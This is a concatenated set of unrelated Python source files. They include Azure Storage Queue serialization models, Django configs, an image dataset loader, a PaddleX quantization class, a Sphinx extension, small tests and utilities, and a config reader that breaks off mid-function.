'queue_items': {'key': 'QueueItems', 'type': '[QueueItem]', 'xml': {'name': 'Queues', 'wrapped': True, 'itemsName': 'Queue'}},
'next_marker': {'key': 'NextMarker', 'type': 'str'},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(
self,
*,
service_endpoint: str,
prefix: str,
max_results: int,
next_marker: str,
marker: Optional[str] = None,
queue_items: Optional[List["QueueItem"]] = None,
**kwargs
):
super(ListQueuesSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = service_endpoint
self.prefix = prefix
self.marker = marker
self.max_results = max_results
self.queue_items = queue_items
self.next_marker = next_marker
class Logging(msrest.serialization.Model):
"""Azure Analytics Logging settings.
All required parameters must be populated in order to send to Azure.
:param version: Required. The version of Storage Analytics to configure.
:type version: str
:param delete: Required. Indicates whether all delete requests should be logged.
:type delete: bool
:param read: Required. Indicates whether all read requests should be logged.
:type read: bool
:param write: Required. Indicates whether all write requests should be logged.
:type write: bool
:param retention_policy: Required. the retention policy.
:type retention_policy: ~azure.storage.queue.models.RetentionPolicy
"""
_validation = {
'version': {'required': True},
'delete': {'required': True},
'read': {'required': True},
'write': {'required': True},
'retention_policy': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str'},
'delete': {'key': 'Delete', 'type': 'bool'},
'read': {'key': 'Read', 'type': 'bool'},
'write': {'key': 'Write', 'type': 'bool'},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'},
}
def __init__(
self,
*,
version: str,
delete: bool,
read: bool,
write: bool,
retention_policy: "RetentionPolicy",
**kwargs
):
super(Logging, self).__init__(**kwargs)
self.version = version
self.delete = delete
self.read = read
self.write = write
self.retention_policy = retention_policy
class Metrics(msrest.serialization.Model):
"""Metrics.
All required parameters must be populated in order to send to Azure.
:param version: The version of Storage Analytics to configure.
:type version: str
:param enabled: Required. Indicates whether metrics are enabled for the Queue service.
:type enabled: bool
:param include_apis: Indicates whether metrics should generate summary statistics for called
API operations.
:type include_apis: bool
:param retention_policy: the retention policy.
:type retention_policy: ~azure.storage.queue.models.RetentionPolicy
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str'},
'enabled': {'key': 'Enabled', 'type': 'bool'},
'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'},
}
def __init__(
self,
*,
enabled: bool,
version: Optional[str] = None,
include_apis: Optional[bool] = None,
retention_policy: Optional["RetentionPolicy"] = None,
**kwargs
):
super(Metrics, self).__init__(**kwargs)
self.version = version
self.enabled = enabled
self.include_apis = include_apis
self.retention_policy = retention_policy
class PeekedMessageItem(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Peek Messages on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param dequeue_count: Required. The number of times the message has been dequeued.
:type dequeue_count: long
:param message_text: Required. The content of the Message.
:type message_text: str
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'dequeue_count': {'required': True},
'message_text': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'dequeue_count': {'key': 'DequeueCount', 'type': 'long'},
'message_text': {'key': 'MessageText', 'type': 'str'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
dequeue_count: int,
message_text: str,
**kwargs
):
super(PeekedMessageItem, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.dequeue_count = dequeue_count
self.message_text = message_text
class QueueItem(msrest.serialization.Model):
"""An Azure Storage Queue.
All required parameters must be populated in order to send to Azure.
:param name: Required. The name of the Queue.
:type name: str
:param metadata: Dictionary of :code:`<string>`.
:type metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str'},
'metadata': {'key': 'Metadata', 'type': '{str}'},
}
_xml_map = {
'name': 'Queue'
}
def __init__(
self,
*,
name: str,
metadata: Optional[Dict[str, str]] = None,
**kwargs
):
super(QueueItem, self).__init__(**kwargs)
self.name = name
self.metadata = metadata
class QueueMessage(msrest.serialization.Model):
"""A Message object which can be stored in a Queue.
All required parameters must be populated in order to send to Azure.
:param message_text: Required. The content of the message.
:type message_text: str
"""
_validation = {
'message_text': {'required': True},
}
_attribute_map = {
'message_text': {'key': 'MessageText', 'type': 'str'},
}
def __init__(
self,
*,
message_text: str,
**kwargs
):
super(QueueMessage, self).__init__(**kwargs)
self.message_text = message_text
class RetentionPolicy(msrest.serialization.Model):
"""the retention policy.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether a retention policy is enabled for the storage
service.
:type enabled: bool
:param days: Indicates the number of days that metrics or logging or soft-deleted data should
be retained. All data older than this value will be deleted.
:type days: int
"""
_validation = {
'enabled': {'required': True},
'days': {'minimum': 1},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool'},
'days': {'key': 'Days', 'type': 'int'},
}
def __init__(
self,
*,
enabled: bool,
days: Optional[int] = None,
**kwargs
):
super(RetentionPolicy, self).__init__(**kwargs)
self.enabled = enabled
self.days = days
class SignedIdentifier(msrest.serialization.Model):
"""signed identifier.
All required parameters must be populated in order to send to Azure.
:param id: Required. a unique id.
:type id: str
:param access_policy: The access policy.
:type access_policy: ~azure.storage.queue.models.AccessPolicy
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'Id', 'type': 'str'},
'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'},
}
def __init__(
self,
*,
id: str,
access_policy: Optional["AccessPolicy"] = None,
**kwargs
):
super(SignedIdentifier, self).__init__(**kwargs)
self.id = id
self.access_policy = access_policy
class StorageError(msrest.serialization.Model):
"""StorageError.
:param message:
:type message: str
"""
_attribute_map = {
'message': {'key': 'Message', 'type': 'str'},
}
def __init__(
self,
*,
message: Optional[str] = None,
**kwargs
):
super(StorageError, self).__init__(**kwargs)
self.message = message
class StorageServiceProperties(msrest.serialization.Model):
"""Storage Service Properties.
:param logging: Azure Analytics Logging settings.
:type logging: ~azure.storage.queue.models.Logging
:param hour_metrics: A summary of request statistics grouped by API in hourly aggregates for
queues.
:type hour_metrics: ~azure.storage.queue.models.Metrics
:param minute_metrics: a summary of request statistics grouped by API in minute aggregates for
queues.
:type minute_metrics: ~azure.storage.queue.models.Metrics
:param cors: The set of CORS rules.
:type cors: list[~azure.storage.queue.models.CorsRule]
"""
_attribute_map = {
'logging': {'key': 'Logging', 'type': 'Logging'},
'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'},
'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'},
'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}},
}
def __init__(
self,
*,
logging: Optional["Logging"] = None,
hour_metrics: Optional["Metrics"] = None,
minute_metrics: Optional["Metrics"] = None,
cors: Optional[List["CorsRule"]] = None,
**kwargs
):
super(StorageServiceProperties, self).__init__(**kwargs)
self.logging = logging
self.hour_metrics = hour_metrics
self.minute_metrics = minute_metrics
self.cors = cors
class StorageServiceStats(msrest.serialization.Model):
"""Stats for the storage service.
:param geo_replication: Geo-Replication information for the Secondary Storage Service.
:type geo_replication: ~azure.storage.queue.models.GeoReplication
"""
_attribute_map = {
'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'},
}
def __init__(
self,
*,
geo_replication: Optional["GeoReplication"] = None,
**kwargs
):
super(StorageServiceStats, self).__init__(**kwargs)
self.geo_replication = geo_replication
|
py | b4000cf070cfc5c095fa3f9e85615ccbf67b3326 | """
WSGI config for ngo_website project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ngo_website.settings')
application = get_wsgi_application()
|
py | b4000d0618bb2a2e51168c27ba692c3207c99f8a | import os.path
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset
from PIL import Image
import random
class FeedersDataset(BaseDataset):
"""
This dataset class can load unaligned/unpaired datasets.
It requires two directories to host training images from domain A '/path/to/data/trainA'
and from domain B '/path/to/data/trainB' respectively.
You can train the model with the dataset flag '--dataroot /path/to/data'.
Similarly, you need to prepare two directories:
'/path/to/data/testA' and '/path/to/data/testB' during test time.
"""
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.dir_goal = os.path.join(opt.dataroot, opt.phase + '_goal') # create a path '/path/to/data/train_goal'
self.goal_paths = sorted(make_dataset(self.dir_goal, opt.max_dataset_size)) # load images from '/path/to/data/trainA'
self.goal_size = len(self.goal_paths) # get the size of dataset A
self.dir_feeders={}
self.feeder_paths={}
self.feeder_sizes={}
for feeder in opt.feeders.split(','):
self.dir_feeders[feeder] = os.path.join(opt.dataroot, opt.phase + feeder) # create a path '/path/to/data/train_x'
self.feeder_paths[feeder] = sorted(make_dataset(self.dir_feeders[feeder], opt.max_dataset_size)) # load images from '/path/to/data/trainB'
self.feeder_sizes[feeder] = len(self.feeder_paths[feeder]) # get the size of dataset B
input_nc=1
output_nc=1 #I'm assuming grayscale everywhere
params = None#{'crop_pos':?}
self.transform = get_transform(self.opt, grayscale=True)
#self.opt.preprocess+='_rot'
self.transformFeeder= get_transform(self.opt, params, grayscale=True)
#for feeder in opt.feeders.split(','):
# feeder == 'synthetic':
# t = get_transform(self.opt, grayscale=(output_nc == 1))
# self.transformFeeder[feeder]=t
def __getitem__(self, index):
"""Return a data point and its metadata information.
Parameters:
index (int) -- a random integer for data indexing
Returns a dictionary that contains A, B, A_paths and B_paths
A (tensor) -- an image in the input domain
B (tensor) -- its corresponding image in the target domain
A_paths (str) -- image paths
B_paths (str) -- image paths
"""
goal_path = self.goal_paths[index % self.goal_size] # make sure index is within then range
if self.opt.serial_batches: # make sure index is within then range
raise NotImplemented('Serial not implemented')
index_B = index % self.B_size
#else: # randomize the index for domain B to avoid fixed pairs.
feeder = random.choice(self.feeders)
if feeder=='synthetic':
feeder_path='sythesized'
feeder_img = generate_synthetic(self.opt)
else:
index_feeder = random.randint(0, self.feeder_sizes[feeder] - 1)
feeder_path = self.feeder_paths[feeder][index_feeder]
feeder_img = Image.open(feeder_path).convert('RGB')
goal_img = Image.open(goal_path).convert('RGB')
# apply image transformation
A = self.transform(goal_img)
B = self.transformFeeder(feeder_img)
return {'A': A, 'B': B, 'A_paths': goal_path, 'B_paths': feeder_path, 'B_branch':feeder}
def __len__(self):
"""Return the total number of images in the dataset.
As we have two datasets with potentially different number of images,
we take a maximum of
"""
return max(self.goal_size, self.B_size)
|
py | b4000dce1251be26b38054f383c2d727e2349c7a | # copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.contrib.slim.quantization.quantization_pass import QuantizationTransformPass
from paddle.fluid.contrib.slim.quantization.quantization_pass import AddQuantDequantPass
from paddle.fluid.contrib.slim.quantization.quantization_pass import _out_scale_op_list
from paddle.fluid.contrib.slim.quantization import PostTrainingQuantization
import paddlex.utils.logging as logging
import paddle.fluid as fluid
import os
import re
import numpy as np
import time
def _load_variable_data(scope, var_name):
'''
Load variable value from scope
'''
var_node = scope.find_var(var_name)
assert var_node is not None, \
"Cannot find " + var_name + " in scope."
return np.array(var_node.get_tensor())
class PaddleXPostTrainingQuantization(PostTrainingQuantization):
def __init__(self,
executor,
dataset,
program,
inputs,
outputs,
batch_size=10,
batch_nums=None,
scope=None,
algo="KL",
quantizable_op_type=["conv2d", "depthwise_conv2d", "mul"],
is_full_quantize=False,
is_use_cache_file=False,
cache_dir="./temp_post_training"):
'''
The class utilizes post training quantization methon to quantize the
fp32 model. It uses calibrate data to calculate the scale factor of
quantized variables, and inserts fake quant/dequant op to obtain the
quantized model.
Args:
executor(fluid.Executor): The executor to load, run and save the
quantized model.
dataset(Python Iterator): The data Reader.
program(fluid.Program): The paddle program, save the parameters for model.
inputs(dict): The input of prigram.
outputs(dict): The output of program.
batch_size(int, optional): The batch size of DataLoader. Default is 10.
batch_nums(int, optional): If batch_nums is not None, the number of
calibrate data is batch_size*batch_nums. If batch_nums is None, use
all data provided by sample_generator as calibrate data.
scope(fluid.Scope, optional): The scope of the program, use it to load
and save variables. If scope=None, get scope by global_scope().
algo(str, optional): If algo=KL, use KL-divergenc method to
get the more precise scale factor. If algo='direct', use
abs_max methon to get the scale factor. Default is KL.
quantizable_op_type(list[str], optional): List the type of ops
that will be quantized. Default is ["conv2d", "depthwise_conv2d",
"mul"].
is_full_quantized(bool, optional): If set is_full_quantized as True,
apply quantization to all supported quantizable op type. If set
is_full_quantized as False, only apply quantization to the op type
according to the input quantizable_op_type.
is_use_cache_file(bool, optional): If set is_use_cache_file as False,
all temp data will be saved in memory. If set is_use_cache_file as True,
it will save temp data to disk. When the fp32 model is complex or
the number of calibrate data is large, we should set is_use_cache_file
as True. Defalut is False.
cache_dir(str, optional): When is_use_cache_file is True, set cache_dir as
the directory for saving temp data. Default is ./temp_post_training.
Returns:
None
'''
self._support_activation_quantize_type = [
'range_abs_max', 'moving_average_abs_max', 'abs_max'
]
self._support_weight_quantize_type = [
'abs_max', 'channel_wise_abs_max'
]
self._support_algo_type = ['KL', 'abs_max', 'min_max']
self._support_quantize_op_type = \
list(set(QuantizationTransformPass._supported_quantizable_op_type +
AddQuantDequantPass._supported_quantizable_op_type))
# Check inputs
assert executor is not None, "The executor cannot be None."
assert batch_size > 0, "The batch_size should be greater than 0."
assert algo in self._support_algo_type, \
"The algo should be KL, abs_max or min_max."
self._executor = executor
self._dataset = dataset
self._batch_size = batch_size
self._batch_nums = batch_nums
self._scope = fluid.global_scope() if scope == None else scope
self._algo = algo
self._is_use_cache_file = is_use_cache_file
self._cache_dir = cache_dir
self._activation_bits = 8
self._weight_bits = 8
self._activation_quantize_type = 'range_abs_max'
self._weight_quantize_type = 'channel_wise_abs_max'
if self._is_use_cache_file and not os.path.exists(self._cache_dir):
os.mkdir(self._cache_dir)
if is_full_quantize:
self._quantizable_op_type = self._support_quantize_op_type
else:
self._quantizable_op_type = quantizable_op_type
for op_type in self._quantizable_op_type:
assert op_type in self._support_quantize_op_type + \
AddQuantDequantPass._activation_type, \
op_type + " is not supported for quantization."
self._place = self._executor.place
self._program = program
self._feed_list = list(inputs.values())
self._fetch_list = list(outputs.values())
self._data_loader = None
self._out_scale_op_list = _out_scale_op_list
self._bit_length = 8
self._quantized_weight_var_name = set()
self._quantized_act_var_name = set()
self._sampling_data = {}
self._quantized_var_kl_threshold = {}
self._quantized_var_min = {}
self._quantized_var_max = {}
self._quantized_var_abs_max = {}
def quantize(self):
'''
Quantize the fp32 model. Use calibrate data to calculate the scale factor of
quantized variables, and inserts fake quant/dequant op to obtain the
quantized model.
Args:
None
Returns:
the program of quantized model.
'''
self._load_model_data()
self._collect_target_varnames()
self._set_activation_persistable()
batch_ct = 0
for data in self._data_loader():
batch_ct += 1
if self._batch_nums and batch_ct >= self._batch_nums:
break
batch_id = 0
logging.info("Start to run batch!")
for data in self._data_loader():
start = time.time()
with fluid.scope_guard(self._scope):
self._executor.run(program=self._program,
feed=data,
fetch_list=self._fetch_list,
return_numpy=False)
if self._algo == "KL":
self._sample_data(batch_id)
else:
self._sample_threshold()
end = time.time()
logging.debug(
'[Run batch data] Batch={}/{}, time_each_batch={} s.'.format(
str(batch_id + 1), str(batch_ct), str(end - start)))
batch_id += 1
if self._batch_nums and batch_id >= self._batch_nums:
break
logging.info("All run batch: ".format(batch_id))
self._reset_activation_persistable()
logging.info("Calculate scale factor ...")
if self._algo == "KL":
self._calculate_kl_threshold()
logging.info("Update the program ...")
if self._algo in ["KL", "abs_max"]:
self._update_program()
else:
self._save_input_threhold()
logging.info("Save ...")
self._save_output_threshold()
logging.info("Finish quant!")
return self._program
def save_quantized_model(self, save_model_path):
'''
Save the quantized model to the disk.
Args:
save_model_path(str): The path to save the quantized model
Returns:
None
'''
with fluid.scope_guard(self._scope):
feed_vars_names = [var.name for var in self._feed_list]
fluid.io.save_inference_model(
dirname=save_model_path,
feeded_var_names=feed_vars_names,
target_vars=self._fetch_list,
executor=self._executor,
params_filename='__params__',
main_program=self._program)
def _load_model_data(self):
'''
Set data loader.
'''
feed_vars = [fluid.framework._get_var(var.name, self._program) \
for var in self._feed_list]
self._data_loader = fluid.io.DataLoader.from_generator(
feed_list=feed_vars, capacity=3 * self._batch_size, iterable=True)
self._data_loader.set_sample_list_generator(
self._dataset.generator(
self._batch_size, drop_last=True),
places=self._place)
def _calculate_kl_threshold(self):
'''
Calculate the KL threshold of quantized variables.
'''
assert self._algo == "KL", "The algo should be KL to calculate kl threshold."
ct = 1
# Abs_max threshold for weights
for var_name in self._quantized_weight_var_name:
start = time.time()
weight_data = self._sampling_data[var_name]
weight_threshold = None
if self._weight_quantize_type == "abs_max":
weight_threshold = np.max(np.abs(weight_data))
elif self._weight_quantize_type == "channel_wise_abs_max":
weight_threshold = []
for i in range(weight_data.shape[0]):
abs_max_value = np.max(np.abs(weight_data[i]))
weight_threshold.append(abs_max_value)
self._quantized_var_kl_threshold[var_name] = weight_threshold
end = time.time()
logging.debug(
'[Calculate weight] Weight_id={}/{}, time_each_weight={} s.'.
format(
str(ct),
str(len(self._quantized_weight_var_name)),
str(end - start)))
ct += 1
ct = 1
# KL threshold for activations
if self._is_use_cache_file:
for var_name in self._quantized_act_var_name:
start = time.time()
sampling_data = []
filenames = [f for f in os.listdir(self._cache_dir) \
if re.match(var_name + '_[0-9]+.npy', f)]
for filename in filenames:
file_path = os.path.join(self._cache_dir, filename)
sampling_data.append(np.load(file_path))
os.remove(file_path)
sampling_data = np.concatenate(sampling_data)
self._quantized_var_kl_threshold[var_name] = \
self._get_kl_scaling_factor(np.abs(sampling_data))
end = time.time()
logging.debug(
'[Calculate activation] Activation_id={}/{}, time_each_activation={} s.'.
format(
str(ct),
str(len(self._quantized_act_var_name)),
str(end - start)))
ct += 1
else:
for var_name in self._quantized_act_var_name:
start = time.time()
self._sampling_data[var_name] = np.concatenate(
self._sampling_data[var_name])
self._quantized_var_kl_threshold[var_name] = \
self._get_kl_scaling_factor(np.abs(self._sampling_data[var_name]))
end = time.time()
logging.debug(
'[Calculate activation] Activation_id={}/{}, time_each_activation={} s.'.
format(
str(ct),
str(len(self._quantized_act_var_name)),
str(end - start)))
ct += 1
def _sample_data(self, iter):
'''
Sample the tensor data of quantized variables,
applied in every iteration.
'''
assert self._algo == "KL", "The algo should be KL to sample data."
for var_name in self._quantized_weight_var_name:
if var_name not in self._sampling_data:
var_tensor = _load_variable_data(self._scope, var_name)
self._sampling_data[var_name] = var_tensor
if self._is_use_cache_file:
for var_name in self._quantized_act_var_name:
var_tensor = _load_variable_data(self._scope, var_name)
var_tensor = var_tensor.ravel()
save_path = os.path.join(self._cache_dir,
var_name + "_" + str(iter) + ".npy")
save_dir, file_name = os.path.split(save_path)
if not os.path.exists(save_dir):
os.mkdirs(save_dir)
np.save(save_path, var_tensor)
else:
for var_name in self._quantized_act_var_name:
if var_name not in self._sampling_data:
self._sampling_data[var_name] = []
var_tensor = _load_variable_data(self._scope, var_name)
var_tensor = var_tensor.ravel()
self._sampling_data[var_name].append(var_tensor)
|
py | b4000e1743e9364125171eb796571a8e8305e514 | from django.conf import settings
from django.urls import include, path
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/",
TemplateView.as_view(template_name="pages/about.html"),
name="about",
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
path(
"sounds/",
include("sonolib.sounds.urls", namespace="sounds"),
),
# User management
path(
"users/",
include("sonolib.users.urls", namespace="users"),
),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(
settings.MEDIA_URL, document_root=settings.MEDIA_ROOT
)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
py | b4000e81964ef6a9c5dc1fa8239426cb2996598b | import juno
class Config:
def __init__(self):
juno.init(
client_id="my client_id",
client_secret="my client_secret",
resource_token="my resource_token",
idempotency_key="my idempotency_key",
sandbox=True,
)
|
py | b4000f1d6022736b54191bbef5e260cb4806ce6a | """Regression Model"""
__docformat__ = "numpy"
from typing import Tuple, List, Any, Union
import pandas as pd
from tsxv import splitTrain
from sklearn import linear_model
from sklearn import pipeline
from sklearn import preprocessing
def get_regression_model(
values: Union[pd.Series, pd.DataFrame],
poly_order: int,
n_input: int,
n_predict: int,
n_jumps: int,
) -> Tuple[List[float], Any]:
"""Fit regression model of variable order
Parameters
----------
values : Union[pd.Series, pd.DataFrame]
Data to fit
poly_order : int
Order of polynomial
n_input : int
Length of input sequence
n_predict : int
Length of prediction sequence
n_jumps : int
Number of jumps in data preparation
Returns
-------
List[float]
List of predicted values
Any
Linear model fit to data
"""
# Split training data
stock_x, stock_y = splitTrain.split_train(
values.values,
n_input,
n_predict,
n_jumps,
)
if not stock_x:
print("Given the model parameters more training data is needed.\n")
return [], None
# Machine Learning model
if poly_order == 1:
model = linear_model.LinearRegression(n_jobs=-1)
else:
model = pipeline.make_pipeline(
preprocessing.PolynomialFeatures(poly_order), linear_model.Ridge()
)
model.fit(stock_x, stock_y)
l_predictions = [
i if i > 0 else 0
for i in model.predict(values.values[-n_input:].reshape(1, -1))[0]
]
return l_predictions, model
|
py | b4000fb96b6e292ef9b330c73b186af27e97a7ec | import os.path as osp
import shutil
import time
from click.testing import CliRunner
from mim.commands.install import cli as install
from mim.commands.train import cli as train
from mim.utils import download_from_file, extract_tar, is_installed
dataset_url = 'https://download.openmmlab.com/mim/dataset.tar'
cfg_url = 'https://download.openmmlab.com/mim/resnet18_b16x8_custom.py'
def setup_module():
runner = CliRunner()
if not is_installed('mmcls'):
result = runner.invoke(install, ['mmcls', '--yes'])
assert result.exit_code == 0
def test_train():
runner = CliRunner()
if not osp.exists('/tmp/dataset'):
download_from_file(dataset_url, '/tmp/dataset.tar')
extract_tar('/tmp/dataset.tar', '/tmp/')
if not osp.exists('/tmp/config.py'):
download_from_file(cfg_url, '/tmp/config.py')
# wait for the download task to complete
time.sleep(5)
result = runner.invoke(
train, ['mmcls', '/tmp/config.py', '--gpus=0', '--work-dir=tmp'])
assert result.exit_code == 0
result = runner.invoke(
train, ['mmcls', '/tmp/xxx.py', '--gpus=0', '--work-dir=tmp'])
assert result.exit_code != 0
shutil.rmtree('tmp')
|
py | b400102d1cc66b97e15b6831315a630b9a27b405 | import os
import ctypes
from bazel_tools.tools.python.runfiles import runfiles
import subprocess
r = runfiles.Create()
path = r.Rlocation('io_tweag_rules_haskell/tests/cc_haskell_import/hs-lib-b-wrapped.so')
foreignlib = ctypes.cdll.LoadLibrary(path)
# ATTN: If you remove this print *statement* hs_init will segfault!
# If you use the python3 print *function*, it will segfault as well!
# TODO: wtf?
print foreignlib
foreignlib.hs_init()
assert(str(foreignlib.add_one_hs(1)) == "2")
|
py | b40012eaf3ad2997ff2332fa3b97a51311554807 | """Utility net operations."""
import os
import numpy as np
import tensorflow as tf
def compute_network_density(graph, collection_name):
"""Compute the Density of a TensorFlow Neural Network."""
graph = tf.get_default_graph()
graph_def = graph.as_graph_def()
nodes_counter = 0
edges_counter = 0
for node in graph_def.node:
if node.name.startswith("{pre}/".format(pre=collection_name)):
nodes_counter += 1
edges_counter += len(node.input)
# Note that we do not check for zero-division: on purpose to force failure.
try:
res = edges_counter/nodes_counter
except ZeroDivisionError:
res = 0
return res
def compute_network_flops(graph, collection_name, logdir="workspace"):
"""Compute the Density of a TensorFlow Neural Network."""
# Prepare the logdir
if not os.path.isdir(logdir):
os.makedirs(logdir)
# Build the options
opts = tf.profiler.ProfileOptionBuilder(
tf.profiler.ProfileOptionBuilder.float_operation()
).with_node_names(
start_name_regexes=["{name}.*".format(name=collection_name)]
).with_file_output(
outfile="{dir}/flops.log".format(dir=logdir)
).build()
# Get the flops object
flops = tf.profiler.profile(
graph,
options=opts
)
# pylint: disable=no-member
return flops.total_float_ops
def sort_sequence(sequence, as_list=True):
"""Sort the elements in the sequence, by layer_index."""
if isinstance(sequence, np.ndarray):
narray = sequence
else:
narray = np.array(sequence)
res = narray[narray[:, 0].argsort(kind='mergesort')]
if as_list:
return res.tolist()
else:
return res
|
py | b40013eee4d608dcc88167ae336a85ba08ad9f32 | # -*- coding: utf-8 -*-
"""
Content ui specs
=================
"""
import os
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from docutils.statemachine import StringList
from sphinx.util.osutil import copyfile
from sphinx.util import logging
CSS_FILE = 'contentui.css'
JS_FILE = 'contentui.js'
class ContentTabsDirective(Directive):
"""
It's container directive with content-tabs class
"""
has_content = True
optional_arguments = 1
def run(self):
self.assert_has_content()
text = '\n'.join(self.content)
node = nodes.container(text)
node['classes'].append('content-tabs')
if self.arguments and self.arguments[0]:
node['classes'].append(self.arguments[0])
self.add_name(node)
self.state.nested_parse(self.content, self.content_offset, node)
return [node]
class ContentTabsContainerDirective(Directive):
has_content = True
option_spec = {'title': directives.unchanged}
required_arguments = 1
def run(self):
self.assert_has_content()
text = '\n'.join(self.content)
node = nodes.container(text)
node['ids'].append('tab-%s' % self.arguments[0])
node['classes'].append('tab-content')
par = nodes.paragraph(text=self.options["title"])
par['classes'].append('tab-title')
node += par
self.add_name(node)
self.state.nested_parse(self.content, self.content_offset, node)
return [node]
class ToggleDirective(Directive):
has_content = True
option_spec = {'header': directives.unchanged}
optional_arguments = 1
def run(self):
node = nodes.container()
node['classes'].append('toggle-content')
par = nodes.container()
par['classes'].append('toggle-header')
if self.arguments and self.arguments[0]:
par['classes'].append(self.arguments[0])
self.state.nested_parse(StringList([self.options["header"]]), self.content_offset, par)
self.state.nested_parse(self.content, self.content_offset, node)
return [par, node]
def add_assets(app):
app.add_css_file(CSS_FILE)
app.add_js_file(JS_FILE)
def copy_assets(app, exception):
if app.builder.name not in ['html', 'readthedocs'] or exception:
return
logger = logging.getLogger(__name__)
logger.info('Copying contentui stylesheet/javascript... ', nonl=True)
dest = os.path.join(app.builder.outdir, '_static', CSS_FILE)
source = os.path.join(os.path.abspath(os.path.dirname(__file__)), CSS_FILE)
copyfile(source, dest)
dest = os.path.join(app.builder.outdir, '_static', JS_FILE)
source = os.path.join(os.path.abspath(os.path.dirname(__file__)), JS_FILE)
copyfile(source, dest)
logger.info('done')
def setup(app):
app.add_directive('content-tabs', ContentTabsDirective)
app.add_directive('tab-container', ContentTabsContainerDirective)
app.add_directive('toggle-header', ToggleDirective)
app.connect('builder-inited', add_assets)
app.connect('build-finished', copy_assets)
|
py | b400142813f80b7bcdf12a6375e0f97e8d4abb69 | #!/usr/bin/python3
"""
Linked list test file
Pythonic implementation of Linked list
"""
__author__ = "Sunil"
__email__ = "[email protected]"
from SinglyLinkedList import SinglyLinkedList
def main():
linkedlist = SinglyLinkedList()
linkedlist.insertNodeAtHead(5)
linkedlist.insertNodeAtHead(15)
linkedlist.insertNodeAtHead(115)
linkedlist.insertNodeAtHead(1115)
print("count = ", linkedlist.Count)
node = linkedlist.Head
while(node):
print(node.Value)
node = node.Next
if __name__ == '__main__':
main() |
py | b40015578312f7a3fdc083e0c02c292f1c468f28 | import logging
from app.slack.slack_client import SlackClient
logger = logging.getLogger('default')
help_message = """```
The bot will respond with ping.
Usage:
> .pong
```"""
class PongCommand:
@staticmethod
async def handle_discord(message):
logger.info("")
await message.channel.send('ping')
@staticmethod
def handle_slack(client: SlackClient, event: dict):
logger.info("")
client.post_message(event, 'ping')
|
py | b40016b3b5045b150339b023fe1a2dc2af74ed33 | # -*- coding: utf-8 -*-
"""
utils.config
~~~~~~~~~~~~
Implements config
:author: Feei <wufeifei#wufeifei.com>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2016 Feei. All rights reserved
"""
import os
import ConfigParser
class Config:
def __init__(self, level1=None, level2=None):
self.project_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
if level1 is None and level2 is None:
return
config = ConfigParser.ConfigParser()
config_file = os.path.join(self.project_directory, 'config')
config.read(config_file)
try:
value = config.get(level1, level2)
except Exception as e:
